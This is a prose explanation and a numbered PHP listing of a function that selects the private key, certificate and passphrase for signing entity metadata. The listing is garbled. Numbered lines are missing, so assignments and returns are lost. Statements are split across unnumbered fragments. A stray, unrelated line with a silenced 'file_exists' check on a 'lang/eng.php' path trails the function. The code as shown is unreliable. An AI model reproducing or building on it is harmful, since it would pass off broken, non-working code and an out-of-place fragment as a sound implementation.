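This function finds which private key and certificate files should be used to sign the metadata for the given entity. It checks, in order, the entity's own "metadata.sign.privatekey" / "metadata.sign.certificate" options, the same two options in the global configuration, and finally the entity's "privatekey" / "certificate" options. It throws an exception if only one option of a pair is set, or if no pair is found at all. When a "privatekey_pass" option is present, the passphrase is copied into the result alongside the key and certificate, so the result should be handled as secret material and kept out of logs and error output.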
   26    {
   27        
   28        if (array_key_exists('metadata.sign.privatekey', $entityMetadata)
   29            || array_key_exists('metadata.sign.certificate', $entityMetadata)
   30        ) {
   31 
   32            if (!array_key_exists('metadata.sign.privatekey', $entityMetadata)
   33                || !array_key_exists('metadata.sign.certificate', $entityMetadata)
   34            ) {
   35 
   36                throw new Exception(
   37                    'Missing either the "metadata.sign.privatekey" or the'.
   38                    ' "metadata.sign.certificate" configuration option in the metadata for'.
   39                    ' the '.
$type.
' "'.$entityMetadata[
'entityid'].
'". If one of'.
 
   40                    ' these options is specified, then the other must also be specified.'
   41                );
   42            }
   43 
   45                'privatekey'  => $entityMetadata['metadata.sign.privatekey'],
   46                'certificate' => $entityMetadata['metadata.sign.certificate']
   47            );
   48 
   49            if (array_key_exists('metadata.sign.privatekey_pass', $entityMetadata)) {
   50                $ret[
'privatekey_pass'] = $entityMetadata[
'metadata.sign.privatekey_pass'];
 
   51            }
   52 
   54        }
   55 
   56        
   57        $privatekey = 
$config->getString(
'metadata.sign.privatekey', 
null);
 
   61                throw new Exception(
   62                    'Missing either the "metadata.sign.privatekey" or the'.
   63                    ' "metadata.sign.certificate" configuration option in the global'.
   64                    ' configuration. If one of these options is specified, then the other'.
   65                    ' must also be specified.'
   66                );
   67            }
   69 
   70            $privatekey_pass = 
$config->getString(
'metadata.sign.privatekey_pass', 
null);
 
   71            if ($privatekey_pass !== null) {
   72                $ret[
'privatekey_pass'] = $privatekey_pass;
 
   73            }
   74 
   76        }
   77 
   78        
   79        if (array_key_exists('privatekey', $entityMetadata)
   80            || array_key_exists('certificate', $entityMetadata)
   81        ) {
   82 
   83            if (!array_key_exists('privatekey', $entityMetadata)
   84                || !array_key_exists('certificate', $entityMetadata)
   85            ) {
   86                throw new Exception(
   87                    'Both the "privatekey" and the "certificate" option must'.
   88                    ' be set in the metadata for the '.
$type.
' "'.
 
   89                    $entityMetadata['entityid'].'" before it is possible to sign metadata'.
   90                    ' from this entity.'
   91                );
   92            }
   93 
   95                'privatekey'  => $entityMetadata['privatekey'],
   96                'certificate' => $entityMetadata['certificate']
   97            );
   98 
   99            if (array_key_exists('privatekey_pass', $entityMetadata)) {
  100                $ret[
'privatekey_pass'] = $entityMetadata[
'privatekey_pass'];
 
  101            }
  102 
  104        }
  105 
  106        throw new Exception(
  107            'Could not find what key & certificate should be used to sign the metadata'.
  108            ' for the '.
$type.
' "'.$entityMetadata[
'entityid'].
'".' 
  109        );
  110    }
if(@file_exists(dirname(__FILE__).'/lang/eng.php')) $certificate